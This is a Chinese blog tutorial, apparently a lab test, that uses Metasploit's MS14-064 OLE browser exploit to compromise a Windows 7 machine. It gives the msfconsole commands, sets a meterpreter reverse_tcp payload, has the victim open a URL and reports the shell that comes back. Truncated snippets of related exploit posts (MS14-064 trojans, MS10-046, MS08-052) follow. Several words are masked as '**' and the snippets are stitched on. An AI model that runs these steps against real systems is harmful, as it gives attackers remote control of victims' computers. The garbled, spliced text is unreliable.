MS14 064 漏洞測試入侵win7

2022-07-16 06:36:11 字數 1186 閱讀 2092

microsoft windows ole遠端**執行漏洞,ole(物件鏈結與嵌入)是一種允許應用程式共享資料和功能的技術,

遠端攻擊者利用此漏洞通過構造的**執行任意**,影響win95+ie3 – win10+ie11全版本...

metasploit裡已經加入了此漏洞的利用模組 :exploit/windows/browser/ms14_064_ole_code_execution

執行命令:

msfconsole    //啟動msf

search ms14   //搜尋關鍵字

use exploit/windows/browser/ms14_064_ole_code_execution  // 載入漏洞利用模組

set payload windows/meterpreter/reverse_tcp    //設定**連線shell

如圖:

需要注意的是箭頭標記的屬性預設為false 需要設定為true ,因為msf中自帶的漏洞利用exp呼叫的是 powershell,

所以msf(metasploit framework)中的exp**只對安裝powershell的系統生效。win7系統安裝自帶powershell,

所以我們這裡測試受害的機器為windows7 32位.

按照圖中各個屬性配置好後 執行exploit即可

得到乙個url位址,複製到受害者機器(win7)測試

當使用者點選允許了後

可以看見這邊**了乙個shell,接下裡我們就可以隨便玩了, 

測試成功,結束。

ms14 064漏洞別IE開啟鏈結執行遠控木馬

ms14 064漏洞別ie開啟鏈結執行遠控木馬 漏洞危及版本 win7 xp 1生成遠控小馬詳見 ngrok配合msf生成木馬 2.將木馬上傳至hsf檔案伺服器複製鏈結 3.開啟metasploit root kali msfconsole msf useexploit windows browse...

MS10 046漏洞測試

這次用到ms10 046這個遠端執行漏洞 windows快捷方式lnk檔案自動執行 漏洞攻擊 命令 1.msfconsole 啟動msf metasploit 2.search ms10 046 搜尋漏洞 3.use windows browser ms10 046 shortcut icon dl...

MS08 052 WMF漏洞分析及漏洞測試

by cutek 一 背景知識 由檔案格式入手,來分析ms08 052漏洞,並構造了乙個可以使沒有補丁的程式崩潰的,1 wmf檔案結構 檔案頭 檔案記錄 檔案記錄 檔案記錄 windows中檔案頭結構如下 typedef struct pwmfrect16 typedef struct wmfpla...